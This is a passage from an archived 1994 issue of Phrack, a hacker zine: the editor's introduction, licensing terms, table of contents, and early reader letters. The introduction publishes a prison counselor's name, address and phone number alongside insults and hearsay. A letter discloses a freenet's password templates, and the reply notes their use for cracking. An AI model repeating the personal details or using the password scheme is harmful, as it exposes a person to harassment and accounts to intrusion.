home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 46.sit / Phrack Issue 46 next >
Text File  |  1997-06-06  |  974KB  |  22,778 lines

  1.                               ==Phrack Magazine==
  2.  
  3.                    Volume Five, Issue Forty-Six, File 1 of 28
  4.  
  5.                                  Issue 46 Index
  6.                               ___________________
  7.  
  8.                                P H R A C K   4 6
  9.  
  10.                                September 20, 1994
  11.                               ___________________
  12.  
  13.                         "La cotorra que chi, no canta"
  14.  
  15. Honey, I'm home!  Anyway, like the little proverb above indicates, I've
  16. been a very busy man since the last issue.  I've been denied entry to
  17. a federal prison in North Carolina (imagine the irony of THAT); I've
  18. been whoring in the Red-Light District of Amsterdam with military
  19. intelligence officers from England, Spain and the US; estuve chicaito en
  20. Nuevo Lardeo; I've tested wireless networks in Canada; and I've been
  21. on TV a few more times.  (No, nimrod, Phrack is not my job...I WORK
  22. for a living.)
  23.  
  24. Needless to say, it has been a chore for me to get Phrack out at all,
  25. much less only a month or so past my self-imposed quarterly deadline.
  26. But hell, I love doing this magazine, so here it is.  Phrack is the only
  27. way I can completely thrill and simultaneously piss off so many people
  28. at once, so I don't think I'll stop any time soon.
  29.  
  30. Pissing people off.  It's what I like to do, and it would appear that
  31. I'm quite good at it.  I realize that there are several extremely
  32. vocal erikb-bashers out there.  And to them I say, "smooches!"
  33. Let's face it, sour grapes make bad whiners.  But hey, "As long as they're
  34. talking about Erikb, let 'em talk."  (Sorry Mr. Ford)
  35.  
  36. Besides piecing together this issue, I've been working on getting
  37. the WWW pages together.  They still aren't 100%, but they are getting
  38. there.  By the time I finally get them together, the Phrack
  39. Web Site should be the ultimate underground resource on the net.
  40. Check it out:  http://freeside.com/phrack.html
  41.  
  42. You may be interested in the federal prison remark from the first
  43. paragraph.  I had a meeting at IBM out in Research Triangle Park.  I
  44. figured that this would be an ideal time to go see Co/Dec who still has
  45. several years of federal time left to serve.  Co/Dec is in
  46. the Federal Correctional Institute at Butner, North Carolina, a short
  47. 30 or so minutes from where I was staying in RTP.
  48.  
  49. Anyway, I receive the necessary forms from Co/Dec to get on the approved
  50. visitors list, and sent them back in.  After several weeks, Co/Dec said
  51. that I still had not been added.  My trip was slated for a week away, so
  52. I called his counselor, Wilbert LeMay.  Mr. LeMay told me that he never got
  53. my forms.  I then fed-ex'ed a copy (that I luckily had kept).  It arrived
  54. on Friday morning, and I was to arrive on Monday.  Mr. LeMay had assured me
  55. that it would be no problem to get me added to Co/Dec's list.
  56.  
  57. When I arrived on Monday, I called the prison to make sure the visit had
  58. been cleared.  Mr. LeMay would not return my calls.  In fact, not only
  59. would he not return any of the 5 or so calls I made, but he didn't even
  60. bother to enter my name on the visitor list until the Wednesday after I
  61. had already left North Carolina.
  62.  
  63. I'm sorry, but this man must be a real prick.
  64.  
  65. A bit of background on LeMay.  First off, according to those on the inside,
  66. LeMay dislikes white people.  He supposedly keeps a picture of slaves
  67. picking cotton on his desk as a constant reminder of the oppression his
  68. people were subjected to.  But perhaps working in the prison system where
  69. you have constant view of the Aryan Brotherhood in action, I'm sure many
  70. would begin to feel likewise.  (Can't we all just get along?)  Secondly,
  71. LeMay dislikes Co/Dec.  He put Co/Dec in solitary confinement for weeks
  72. because Co/Dec had a DOS MANUAL!  A fucking DOS MANUAL!  You do not
  73. put someone in the fucking hole for brushing up on the syntax for xcopy!
  74. You put them in the hole for inciting a fucking shank war, or for stealing
  75. food, or for punching a guard.  Later, Co/Dec found himself in solitary
  76. confinement AGAIN because he traded some smokes for telephone parts he was
  77. going to use to fix a radio.  The hole again.  Not for weapons and drugs,
  78. NO!  Much worse:  wires and a speaker!
  79.  
  80. The prison now considers Co/Dec a security risk, and read all OUTGOING
  81. mail he sends.  Not just the regular reading of all incoming mail
  82. that any inmate would expect.  He can't take any clases, he's had
  83. several more days added to his sentence for "bad time served,"
  84. and in addition, all of his phone calls are live monitored and recorded.
  85. (A funny note, during one conversation I found that my touchtones would
  86. control the equipment they were using to record the call.  The equipment
  87. they were using was improperly connected and gave off a terrible hum
  88. when activated.  I kept turning off the recording, and the security
  89. officer kept having to turn it back on.)
  90.  
  91. All of this, due to Counselor Wilbert LeMay.  Thanks guy.
  92.  
  93. If someone can so grossly abuse their power to completely remove the
  94. dignity of another human being, inmate or otherwise, that person needs
  95. to face severe disciplinary action.  I'm writing the warden.  Directory
  96. Assistance says that Wilbert can be reached at:
  97.  
  98. Wilbert LeMay
  99. 701 East E St.
  100. Butner, NC 27509
  101. 919-575-6375
  102.  
  103. Fun fact:  Butner is serviced by GTE.
  104.  
  105. You know, its pretty odd that as hackers, we probably know a larger number
  106. of ex-cons and current inmates than most people.
  107.  
  108. But anyway, on to Phrack.
  109.  
  110. This issue is pretty odd in that "The Man" has consented to write
  111. a few syllables for us to distribute.  Yes, Winn Schwartau submitted
  112. his unique perspectives of Defcon and HOPE.  It's funny how many people
  113. left Defcon this year and ran home to find information on HIRF weapons
  114. after hearing Winn speak.  (If you've actually built one by now, email
  115. me.)
  116.  
  117. What else?  GS1, Pagers, Voice Mail, VisaNet, Area 51, Programs,
  118. Conferences, and an incomplete university dialup list.  (Putting out
  119. an incomplete list really irritates me, but hell, its taking a LOT
  120. longer than I expected to get some 1300 dialups without more help.
  121. AHEM!)
  122.  
  123. Can you dig it?  I knew that you could.
  124.  
  125. -------------------------------------------------------------------------
  126.  
  127.                         READ THE FOLLOWING
  128.  
  129.                 IMPORTANT REGISTRATION INFORMATION
  130.  
  131. Corporate/Institutional/Government:  If you are a business,
  132. institution or government agency, or otherwise employed by,
  133. contracted to or providing any consultation relating to computers,
  134. telecommunications or security of any kind to such an entity, this
  135. information pertains to you.
  136.  
  137. You are instructed to read this agreement and comply with its
  138. terms and immediately destroy any copies of this publication
  139. existing in your possession (electronic or otherwise) until
  140. such a time as you have fulfilled your registration requirements.
  141. A form to request registration agreements is provided
  142. at the end of this file.  Cost is $100.00 US per user for
  143. subscription registration.  Cost of multi-user licenses will be
  144. negotiated on a site-by-site basis.
  145.  
  146. Individual User:  If you are an individual end user whose use
  147. is not on behalf of a business, organization or government
  148. agency, you may read and possess copies of Phrack Magazine
  149. free of charge.  You may also distribute this magazine freely
  150. to any other such hobbyist or computer service provided for
  151. similar hobbyists.  If you are unsure of your qualifications
  152. as an individual user, please contact us as we do not wish to
  153. withhold Phrack from anyone whose occupations are not in conflict
  154. with our readership.
  155.  
  156. _______________________________________________________________
  157.  
  158. Phrack Magazine corporate/institutional/government agreement
  159.  
  160.    Notice to users ("Company"):  READ THE FOLLOWING LEGAL
  161. AGREEMENT.  Company's use and/or possession of this Magazine is
  162. conditioned upon compliance by company with the terms of this
  163. agreement.  Any continued use or possession of this Magazine is
  164. conditioned upon payment by company of the negotiated fee
  165. specified in a letter of confirmation from Phrack Magazine.
  166.  
  167.    This magazine may not be distributed by Company to any
  168. outside corporation, organization or government agency.  This
  169. agreement authorizes Company to use and possess the number of copies
  170. described in the confirmation letter from Phrack Magazine and for which
  171. Company has paid Phrack Magazine the negotiated agreement fee.  If
  172. the confirmation letter from Phrack Magazine indicates that Company's
  173. agreement is "Corporate-Wide", this agreement will be deemed to cover
  174. copies duplicated and distributed by Company for use by any additional
  175. employees of Company during the Term, at no additional charge.  This
  176. agreement will remain in effect for one year from the date of the
  177. confirmation letter from Phrack Magazine authorizing such continued use
  178. or such other period as is stated in the confirmation letter (the "Term").
  179. If Company does not obtain a confirmation letter and pay the applicable
  180. agreement fee, Company is in violation of applicable US Copyright laws.
  181.  
  182.     This Magazine is protected by United States copyright laws and
  183. international treaty provisions.  Company acknowledges that no title to
  184. the intellectual property in the Magazine is transferred to Company.
  185. Company further acknowledges that full ownership rights to the Magazine
  186. will remain the exclusive property of Phrack Magazine and Company will
  187. not acquire any rights to the Magazine except as expressly set
  188. forth in this agreement.  Company agrees that any copies of the
  189. Magazine made by Company will contain the same proprietary
  190. notices which appear in this document.
  191.  
  192.     In the event of invalidity of any provision of this agreement,
  193. the parties agree that such invalidity shall not affect the validity
  194. of the remaining portions of this agreement.
  195.  
  196.     In no event shall Phrack Magazine be liable for consequential, incidental
  197. or indirect damages of any kind arising out of the delivery, performance or
  198. use of the information contained within the copy of this magazine, even
  199. if Phrack Magazine has been advised of the possibility of such damages.
  200. In no event will Phrack Magazine's liability for any claim, whether in
  201. contract, tort, or any other theory of liability, exceed the agreement fee
  202. paid by Company.
  203.  
  204.     This Agreement will be governed by the laws of the State of Texas
  205. as they are applied to agreements to be entered into and to be performed
  206. entirely within Texas.  The United Nations Convention on Contracts for
  207. the International Sale of Goods is specifically disclaimed.
  208.  
  209.     This Agreement together with any Phrack Magazine
  210. confirmation letter constitute the entire agreement between
  211. Company and Phrack Magazine which supersedes any prior agreement,
  212. including any prior agreement from Phrack Magazine, or understanding,
  213. whether written or oral, relating to the subject matter of this
  214. Agreement.  The terms and conditions of this Agreement shall
  215. apply to all orders submitted to Phrack Magazine and shall supersede any
  216. different or additional terms on purchase orders from Company.
  217.  
  218. _________________________________________________________________
  219.  
  220.             REGISTRATION INFORMATION REQUEST FORM
  221.  
  222.  
  223. We have approximately __________ users.
  224.  
  225. Enclosed is  $________
  226.  
  227. We desire Phrack Magazine distributed by (Choose one):
  228.  
  229. Electronic Mail: _________
  230. Hard Copy:       _________
  231. Diskette:        _________  (Include size & computer format)
  232.  
  233.  
  234. Name:_______________________________  Dept:____________________
  235.  
  236. Company:_______________________________________________________
  237.  
  238. Address:_______________________________________________________
  239.  
  240. _______________________________________________________________
  241.  
  242. City/State/Province:___________________________________________
  243.  
  244. Country/Postal Code:___________________________________________
  245.  
  246. Telephone:____________________   Fax:__________________________
  247.  
  248.  
  249. Send to:
  250.  
  251. Phrack Magazine
  252. 603 W. 13th #1A-278
  253. Austin, TX 78701
  254. -----------------------------------------------------------------------------
  255.  
  256.  
  257. Enjoy the magazine.  It is for and by the hacking community.  Period.
  258.  
  259.  
  260.       Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
  261.                 3L33t : Ice-9 (for helping me get this done!)
  262.              Rad Band : Green Day
  263.                  News : Datastream Cowboy
  264.           Photography : The Man
  265.     Prison Consultant : Co / Dec
  266.        The Young Girl : Jane March
  267.     Motor Trend's Car
  268.           of the Year : The 2600 Van
  269. Dickhead of the Month : Wilbert LeMay at FCI Butner
  270.             Thanks To : Szechuan Death, Carl Corey, The Shining, Dcypher
  271.                         Hitman Italy, Herd Beast, Dr. Delam, Maldoror,
  272.                         The Red Skull, PsychoSpy, Seven Up, Erudite, Ice Jey
  273.     Special Thanks To : Winn Schwartau
  274.  
  275. Phrack Magazine V. 5, #46, September 20, 1994.     ISSN 1068-1035
  276. Contents Copyright (C) 1994 Phrack Magazine, all rights reserved.
  277. Nothing may be reproduced in whole or in part without written
  278. permission of the Editor-In-Chief.  Phrack Magazine is made available
  279. quarterly to the amateur computer hobbyist free of charge.  Any
  280. corporate, government, legal, or otherwise commercial usage or
  281. possession (electronic or otherwise) is strictly prohibited without
  282. prior registration, and is in violation of applicable US Copyright laws.
  283. To subscribe, send email to phrack@well.sf.ca.us and ask to be added to
  284. the list.
  285.  
  286.                     Phrack Magazine
  287.                     603 W. 13th #1A-278              (Phrack Mailing Address)
  288.                     Austin, TX 78701
  289.  
  290.                     freeside.com                     (Phrack FTP Site)
  291.                     /pub/phrack
  292.  
  293.                     http://freeside.com/phrack.html  (Phrack WWW Home Page)
  294.  
  295.                     phrack@well.sf.ca.us             (Phrack E-mail Address)
  296.                  or phrackmag on America Online
  297.  
  298. Submissions to the above email address may be encrypted
  299. with the following key : (Not that we use PGP or encourage its
  300. use or anything.  Heavens no.  That would be politically-incorrect.
  301. Maybe someone else is decrypting our mail for us on another machine
  302. that isn't used for Phrack publication.  Yeah, that's it.   :) )
  303.  
  304. ** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED **
  305.  
  306. Phrack goes out plaintext...you certainly can subscribe in plaintext.
  307.  
  308. -----BEGIN PGP PUBLIC KEY BLOCK-----
  309. Version: 2.3a
  310.  
  311. mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
  312. ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
  313. a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
  314. tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
  315. =q2KB
  316.  
  317. -----END PGP PUBLIC KEY BLOCK-----
  318.  
  319.  
  320.   -= Phrack 46 =-
  321.  Table Of Contents
  322.  ~~~~~~~~~~~~~~~~~
  323.  1.  Introduction by The Editor                                   17 K
  324.  2.  Phrack Loopback / Editorial                                  52 K
  325.  3.  Line Noise                                                   61 K
  326.  4.  Line Noise                                                   56 K
  327.  5.  Phrack Prophile on Minor Threat                              12 K
  328.  6.  Paid Advertisement                                           62 K
  329.  7.  Paid Advertisement (cont)                                    45 K
  330.  8.  The Wonderful World of Pagers by Erik Bloodaxe               24 K
  331.  9.  Legal Info by Szechuan Death                                 13 K
  332.  10. A Guide to Porno Boxes by Carl Corey                         13 K
  333.  11. Unix Hacking - Tools of the Trade by The Shining             42 K
  334.  12. The fingerd Trojan Horse by Hitman Italy                     32 K
  335.  13. The Phrack University Dialup List                            12 K
  336.  14. A Little About Dialcom by Herd Beast                         29 K
  337.  15. VisaNet Operations Part I by Ice Jey                         50 K
  338.  16. VisaNet Operations Part II by Ice Jey                        44 K
  339.  17. Gettin' Down 'N Dirty Wit Da GS/1 by Maldoror & Dr. Delam    25 K
  340.  18. Startalk by The Red Skull                                    21 K
  341.  19. Cyber Christ Meets Lady Luck Part I by Winn Schwartau        45 K
  342.  20. Cyber Christ Meets Lady Luck Part II by Winn Schwartau       42 K
  343.  21. The Groom Lake Desert Rat by PsychoSpy                       44 K
  344.  22. HOPE by Erik Bloodaxe                                        51 K
  345.  23. Cyber Christ Bites the Big Apple by Winn Schwartau           60 K
  346.  24. The ABCs of Better Hotel Staying by Seven Up                 12 K
  347.  25. AT&T Definity System 75/85 by Erudite                        13 K
  348.  26. Keytrap v1.0 Keyboard Key Logger by Dcypher                  35 K
  349.  27. International Scenes by Various Sources                      44 K
  350.  28. Phrack World News by Datastream Cowboy                       38 K
  351.  
  352.                                                     Total:       996 K
  353.  
  354. _______________________________________________________________________________
  355.  
  356. "Most hackers would have sold out their mother."
  357.          Justin Tanner Peterson
  358.  
  359. "Treason is loved of many but the traitor hated of all."
  360.         Robert Greene (1552-1592)
  361.  
  362. "They smile in your face, but all the while they want to take your place."
  363.         The O'Jays
  364.                               ==Phrack Magazine==
  365.  
  366.                  Volume Five, Issue Forty-Six, File 2 of 28
  367.  
  368. ****************************************************************************
  369.  
  370.                                 Phrack Loopback
  371.  
  372.  
  373. ------------------------------------------------------------------------------
  374.  
  375. I'd like to write you about my friends cat.  His name is 'Cid.  Cid
  376. loves reading, in fact he'll read just about anything, from the labels on
  377. his cat food tins to the instructions on the "real" use of his Grafix
  378. (incense burner :) ).  Well one take, 'Cid (or was it me) was indulging
  379. in the reason he got his moniker and mentioned that he'd like to receive
  380. Phrack.  Well i told him he could just subscribe to it and then he went
  381. into a real sob story about how he doesn't have net access.  So as a
  382. favor to 'Cid (who really does exist, and really has tripped out on brain
  383. blotters) i'd like to subscribe to Phrack.
  384.  
  385. [You my want to take note that Phrack can also be printed on paper.
  386.  Now, that's a lot of blotter.
  387.  
  388.  You've got your subscription, now go watch some anime.]
  389.  
  390. ------------------------------------------------------------------------------
  391.  
  392. I recently got a new job and shortly after beginning working there, they
  393. decided to retool and reorganize a bit for better productivity.
  394.  
  395. While we were going through some old boxes and stuff, I came across a
  396. little black box with the words "Demon Dialer" molded into the front of
  397. it, it even had the (functional!) 20volt power supply.
  398.  
  399. Needless to say I was pretty happy with my find.  I asked if I could have
  400. it and since no one else there seemed to know what to make of it, mine it
  401. was!
  402.  
  403. My only problem now... I've played around with it, and it seems to do a
  404. lot more than what I originally thought, but the fact of the matter is..
  405. I really haven't the foggiest idea of how to get it to REALLY work for me.
  406.  
  407. If anyone has any information, or better still, actual documentation for
  408. a Telephonics Inc, Demon Dialer.. I'd really appreciate passing it on to me.
  409.  
  410. Also, something rater strange.  The phone cable attached to it had a
  411. normal looking 4-wire connector on one end, but the other was split to
  412. have RJ jacks, one with the yellow-black combo and one with the
  413. red-green.  The split ends (sorry :)) were plugged into the WALL and
  414. PHONE jacks on the demon dialer.  The purpose for this perplexes me since
  415. one's supposed to be input and one's supposed to be a passthrough for the
  416. phone to be plugged into.
  417.  
  418. Anyway, any info would be nice.  Thanks guys.
  419.  
  420. [Telephonics was one of those odd telco device manufacturers back in the
  421.  80's.  They made the demon dialer (a speed dialing device), a
  422.  two-line conference box, a divertor, etc.  Essentially, they provided
  423.  in hardware what the telco's were beginning to roll-out in software.
  424.  
  425.  I think the line splitter you have was merely plugged into those
  426.  two jacks for storage purposes.  What that probably was for was to
  427.  allow two lines to use the Demon Dialer.  It was probably just reversed
  428.  when your company boxed it so it wouldn't get lost.
  429.  
  430.  I'm not sure if Telephonics is still in business.  A good place to
  431.  start looking for info would be comp.dcom.telecom or alt.dcom.telecom.
  432.  Another good place may be Hello Direct (800-HI-HELLO).  They used to
  433.  do have Telephonics equipment available for mail-order.]
  434.  
  435. ------------------------------------------------------------------------------
  436.  
  437. I saw an ad for a book called "Secrets of a SuperHacker" by Knightmare.
  438. Supposedly it intersperses tales of his exploits with code and examples.
  439. I have big doubts, but have you heard anything good/bad about it?
  440.  
  441. [Your doubts are well founded.  I got an advance copy of that book.
  442.  Let's put it this way:  does any book that contains over a dozen pages
  443.  of "common passwords" sound like ground breaking material?
  444.  
  445.  This book is so like "Out of the Inner Circle" that I almost wanted
  446.  to believe Knightmare (Dennis Fiery) was really yet another
  447.  alias for Bill Landreth.  Imagine "Out of the Inner Circle" with
  448.  about a hundred or more extra pages of adjectives and examples that
  449.  may have been useful years back.
  450.  
  451.  The Knightmare I knew, Tom in 602, whose bust by Gail Thackeray
  452.  gave law enforcement a big buffer of the Black Ice Private BBS
  453.  and help spark the infamous LOD Hacker Crackdown, certainly didn't
  454.  have anything to do with this.  In fact, the book has a kind of
  455.  snide tone to it and is so clueless, that leads me to believe it
  456.  may have been written by a cop or security type person looking to
  457.  make a quick buck.
  458.  
  459.  As far as source code, well, there is a sample basic program that
  460.  tries to emulate a university login.
  461.  
  462.  If you want a good book, go buy "Firewalls and Internet Security" by
  463.  Cheswick and Bellovin.]
  464.  
  465. ------------------------------------------------------------------------------
  466.  
  467. Hey Chris,
  468.  
  469. I'm sure you are under a constant avalanche of requests for certain files,
  470. so I might as well add to your frustration <grin>.  I know of a program
  471. that supposedly tracks cellular phone frequencies and displays them on
  472. a cellmap.  However, I don't know the name of the program or (obviously)
  473. where to find this little gem.  I was wondering if you could possibly
  474. enlighten me on a way to acquire a program similar to the one I have
  475. described.  I have developed some other methods of tracking locations
  476. of cellular calls.  However my methods rely on a database and manually
  477. mapping cellular phones, this method is strictly low tech.  Of course
  478. this would be for experimental use only, therefore it would not be used
  479. to actually track actual, restricted, radio spectrum signals.  I wouldn't
  480. want the aether Gestapo pummeling our heads and necks.
  481.  
  482. [I don't know of anything that plots frequencies on a cellmap.  How would
  483.  you know the actual locations of cells for whatever city you may
  484.  be in to plot them accurately?
  485.  
  486.  There are a number of programs written to listen to forward channel messages
  487.  and tell you when a call is going to jump to another channel.  The cellular
  488.  telephone experimenter's kit from Network Wizards has a lot of nice
  489.  C source that will let you write your own programs that work with their
  490.  interface to the OKI 900.  I suppose you could get the FCC database
  491.  CD-ROM for your state and make note of longitude and latitude of cell sites
  492.  and make your own database for your city, and then make a truly
  493.  visual representation of a cellmap and watch calls move from cell to cell.
  494.  But I don't think there is such a thing floating around the underground
  495.  at present.
  496.  
  497.  Of course the carriers have this ability, and are more than happy to make
  498.  it available to Law Enforcement (without a warrant mind you).  Hi OJ!
  499.  
  500.  email Mark Lottor mw@nw.com for more info about the CTEK.]
  501.  
  502. ------------------------------------------------------------------------------
  503.  
  504. I saw this in a HoHoCon ad:
  505.  
  506.         Top Ten Nark List
  507.         1. Traxxter
  508.         2. Scott Chasin
  509.         3. Chris Goggans
  510.         4. Aget Steal
  511.         5. Dale Drrew
  512.         6. Cliff Stoll
  513.         7. [blank]
  514.         8. Julio Fernandez
  515.         9. Scanman
  516.        10. Cori Braun
  517.  
  518. What did Chris Goggans do?  Isn't he Erik Bloodaxe, the publisher of
  519. Phrack?  I sincerely doubt that the feds would have someone
  520. working for them that puts out a publication like Phrack.  It would
  521. be way too much of an embarrassment for them.  I wrote to the
  522. editor of Phrack when I read that Agent Steal said that the publisher
  523. of Phrack was a Fed - IN PHRACK no less.  He said it was a stupid rumor.
  524. Is there anything to support this fact?  And why is there now some manhunt for
  525. Agent Steal (at CFP the FBI was checking legs) if Steal was admittedly
  526. their employee?  The whole thing is very confusing to me.  Please explain.
  527. If Goggans isn't Bloodaxe then he'd Knight Lightning (this just came to me).
  528. Nevertheless, what's the story here?
  529.  
  530. [First off, I think you take things a little too seriously.  If you are on
  531.  a nark hunt, worry about your associates, not people you obviously
  532.  don't even know.  Chris Goggans (ME) is most positively Erik Bloodaxe.
  533.  Thanks for remembering.
  534.  
  535.  Agent Steal was involved with the FBI.  This is a fact.
  536.  In his case, he even appeared to have some kind of immunity while trying
  537.  to gather information on other hackers like Mitnik and Poulsen.  This
  538.  immunity is under scrutiny by the Bureau's own Internal Affairs (or so the
  539.  new rumors go), since Steal was pulling a fast one and committing crimes
  540.  the Bureau didn't know about to get some quick cash while he set up his
  541.  friends.
  542.  
  543.  My story is a bit more convoluted.  You can sum it up by saying, if you
  544.  interfere with my businesses, I'll try my best to track you down and turn
  545.  you in.  I guess I am a nark.]
  546.  
  547. ------------------------------------------------------------------------------
  548.  
  549. I read in the last Phrack (45) that you wanted someone to write a few
  550. words on scrambling systems. Give me a rough outline of what you want
  551. and I'll see if I can help :-) Basically I wrote the Black Book
  552. (European Scrambling Systems 1,2,3,4,5 and World Satellite TV &
  553. Scrambling Methods) and also edit Hack Watch News & Syndicated
  554. HackWatch. They all deal with scrambling system hacks as opposed to
  555. computer hacking & phreaking. (Things are a bit iffy here as regards
  556. phreaking as all calls are logged but the eprom phone cards are easy
  557. to hack) Oh yeah and another claim to fame ;-) if you can call it
  558. that, is that I was quoted in an article on satellite piracy in
  559. "Wired" August issue.
  560.  
  561. This Hawkwind character that you had an article from in Phrack43
  562. sounds like a *real* hacker indeed :-> Actually there is an elite in
  563. Ireland but it is mainly concerned with satellite hacking and that
  564. Hawkwind character is obviously just a JAFA (Irish hacker expression
  565. - Just Another Fu**ing Amateur). Most of the advanced telco stuff is
  566. tested in the south of the country as Dublin is not really that
  567. important in terms of comms - most of the Atlantic path satellite
  568. comms gear and brains are on the south coast :-)
  569.  
  570. Actually the Hawkwind article really pissed off some people here in
  571. Ireland - there were a few questions asked on my own bbs (Special
  572. Projects +353-51-50143) about this character. I am not even sure if
  573. the character is a real hacker or just a wannabe - there were no
  574. responses from any of his addresses. SP is sort of like the neutral
  575. territory for  satellite and cable hacking information in Europe
  576. though there are a few US callers. With the way things are going with
  577. your new DBS DirecTv system in the US, it looks like the European
  578. satellite hackers are going to be supplying a lot of information
  579. (DirecTv's security overlay was developed by News Datacom - the
  580. developers of the totally hacked VideoCrypt system here in Europe).
  581.  
  582. There telco here uses eprom phone cards. These are extremely easy to
  583. hack (well most real hackers in .IE work on breaking satellite
  584. scrambling systems that use smart cards) as they are only serial
  585. eprom.
  586.  
  587. Regards
  588.  
  589. [About the satellite information:  YES!  Write the biggest, best
  590.  article the whole fucking hacker world has ever seen about
  591.  every aspect of satellite tv!!  Personally, I'm more interested in
  592.  that than anything else anyone could possibly write (seeing as how
  593.  I'm about to buy a dish for both C and Ku).
  594.  
  595.  About Hawkwind's article on hacking in Ireland:  If I were to write
  596.  an article about hacking in America, it would be entirely different
  597.  than anyone else in America would write.  A country is a big place.
  598.  Just because someone else's hacking experience is different than
  599.  your own, it's no reason to discredit them.  However, if your
  600.  exposure to the scene in Ireland is so completely different than
  601.  Hawkwind's, I would LOVE to print it as well.]
  602.  
  603. ------------------------------------------------------------------------------
  604.  
  605. The Columbus Freenet uses a password generating routine that takes the
  606. first and last initial of the user's real name, and inserts it into a randomly
  607. chosen template.  Some of the templates are:
  608.  
  609. E(f)www5(l)
  610. (f)22ww5(l)    where f and l are first and last initials
  611. (f)2ww97(l)
  612. (f)2ww95(l)
  613.  
  614. and so on.  There are not too many of these templates, I guess maybe 50.
  615. I imagine most people go in and change their password right away, but
  616. then again that's what a prudent person would do (so they probably don't).
  617.  
  618. Columbus 2600 meetings:
  619.  
  620. Fungal Mutoid-sysop of The KrackBaby BBS (614-326-3933) organized the
  621. first 2600 meetings in Columbus, unfortunately hardly anyone shows up...
  622. I don't know why HP is so dead in Central Ohio, but fear and paranoia
  623. run rampant.
  624. That's all for now...keep up with the good work!
  625.  
  626. R.U.Serius?!
  627.  
  628. [Hmmm...templates are always a bad thing. All one has to do is get the
  629.  program that generates them, and viola, you've got a pre-made dict file
  630.  for your crack program.  Not very smart on the part of the Freenet,
  631.  but hacking a Freenet, is like kicking a puppy.
  632.  
  633.  I hope more people go to your 2600 meetings.  The ones here in Austin
  634.  kinda died out too.  Maybe our cities are just lame.]
  635.  
  636. ------------------------------------------------------------------------------
  637.  
  638. A complaint:  That piece about McDonald's in Phrack 45 was, in a word, LAME.
  639. Surely Phrack can do better.  Maliciousness for its own sake isn't very
  640. interesting and frankly the article didn't have any ideas that a bored
  641. 13-year-old couldn't have thought up--probably written by one.
  642.  
  643. That aside, I found some good stuff in there.  Some of it was old news,
  644. but Phrack serves an archival purpose too, so that was ok.  On a more
  645. personal note, I could really relate to your account of HoHoCon--not that
  646. I was there, just that I have started to feel old lately even though I don't
  647. turn 25 for another 2 days  :)  Sometimes I feel myself saying things like
  648. "Why, sonny, when I was your age the Apple II was king..."
  649.  
  650. Keep up the good work, and don't let the lamers get you down.
  651.  
  652. [Thanks for the letter.  I personally thought the McDonald's file was
  653.  a laugh riot.  Even if it was juvenile and moronic, I wouldn't expect
  654.  anyone to analyze it and go through with anything it contained.  It was
  655.  just for fun.  Lighten up :)
  656.  
  657.  I am glad to see that at least someone else recognizes that Phrack
  658.  is attempting to serve as an archive of our subculture, rather than just
  659.  a collection of technical info that will be outdated overnight, or a
  660.  buglist that will be rendered mostly unusable within hours of release.
  661.  
  662.  There is so much going on within the community, and it is becoming such a
  663.  spectacle in the popular media, that in 20 years, we can all go back and
  664.  look at Phrack and remember the people, places, and meetings that
  665.  changed the face of the net.
  666.  
  667.  Or maybe I'm just terribly lame, and either 1) refuse to put in the
  668.  good stuff, 2) don't have access to the good stuff, 3) exist only as a
  669.  puppet agent of The Man, or 4) Don't know nothin' 'bout Telco!
  670.  But you know what they say about opinions.]
  671.  
  672. ----------------------------------------------------------------------------
  673.  
  674. I have a few comments on your editorial in Phrack 44 (on information
  675. wants to be free).  Thanks for voicing an opinion that is shared by many
  676. of us.  I am glad to see a public figure in the CuG with nutz enuff to
  677. actually come out and make such a statement and mean it.
  678. Again, thanks.
  679.  
  680. Now on the subject of hacking as a whole.  Is it just me, or are the number
  681. of losers on the increase?  There have always been those who would try
  682. and apply these skills to ripoff scams and system trashing but now that
  683. seems to be the sole intent of many of the "hackers" I come into contact
  684. with.  What ever happened to hacking to learn more about the system.  To
  685. really hack a system (be it phone, computer), is a test of skill and
  686. determination, and upon success you walk away with a greater understanding
  687. of the machine and its software.  Hacking is more than just knowing how
  688. to run crack on a filched password file, or using some exploitation
  689. scripts picked up on IRC, it is a quest for knowledge and gaining
  690. superiority over a system by use of great skill acquired by a deliberate
  691. effort.  Once was a time when things like toll fraud (I do miss blue
  692. boxes) were a means to an end, now they seem to be the end in itself.
  693.  
  694. Also, I am researching info on OSI comsec procedures and have found some
  695. really interesting goodies, if you are interested in publishing
  696. my piece when completed, let me know..
  697.  
  698. [(NOTE:  This came from a .mil)
  699.  Man, I'm glad to see that people in the armed forces still have minds
  700.  of their own.  Not many people would express such a thing openly.
  701.  
  702.  Yes, the destructive/profit-motivated trends of many of the hackers of
  703.  today are pretty sad.  But you have to realize, as the technology
  704.  becomes more and more like consumer electronics, rather than the
  705.  traditional mold of computer as scientific research tool, an entirely
  706.  different market segment will be exposed to it and use the technology
  707.  for less than scrupulous means.
  708.  
  709.  Even the act of hacking itself.  Today, I can basically gain access
  710.  to any model of system known to man by asking.  I realize that
  711.  there are many who cannot accomplish such a thing, but with the
  712.  proliferation of public access sites, almost everyone can afford
  713.  access to the net to explore and learn.  The point comes down to this:
  714.  if you have an account on a Sun, why do you need an account on a Sun
  715.  at Boeing, unless you either 1) want to sell the cad files of the 777 to
  716.  Airbus or McDonnell-Douglas 2) want to get financial information to
  717.  make a killing on Wall Street, or 3) just want to have an ego boost
  718.  and say "I OWN BOEING!"
  719.  
  720.  Personally, I can understand the ego boost aspect, but I've decided that
  721.  I'd much rather get paid by a company like Boeing to hack for them
  722.  than against them.  I don't want to sell anyone's info, so hacking
  723.  into any company is basically useless to me, unless they are paying me
  724.  to look for potential weaknesses.
  725.  
  726.  Granted, it's not an easy market to get into, but it's a goal to
  727.  shoot for.
  728.  
  729.  And for those who find it impossible to quit due to fear of losing
  730.  their edge, check out my editorial in this issue for a possible
  731.  solution.]
  732.  
  733. ------------------------------------------------------------------------------
  734.  
  735. I am looking for a Macintosh app that does the same thing as an app
  736. called "Demon Dial" that has been lost in the annals of software
